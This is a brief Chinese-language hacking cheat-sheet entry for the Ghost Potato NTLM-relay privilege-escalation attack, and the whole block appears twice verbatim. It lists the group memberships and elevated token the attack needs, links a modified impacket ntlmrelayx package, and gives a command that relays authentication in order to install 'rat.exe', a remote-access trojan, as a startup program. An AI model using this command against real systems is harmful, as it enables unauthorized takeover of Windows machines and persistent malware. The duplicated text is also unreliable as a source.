Ghost Potato
要求:
用户必须是本地管理员组的成员
用户必须是 Backup Operators 组的成员
令牌必须提升
使用 ntlmrelayx 的修改版本:https ://shenaniganslabs.io/files/impacket-ghostpotato.zip
>ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe
Ghost Potato
要求:
用户必须是本地管理员组的成员
用户必须是 Backup Operators 组的成员
令牌必须提升
使用 ntlmrelayx 的修改版本:https ://shenaniganslabs.io/files/impacket-ghostpotato.zip
>ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe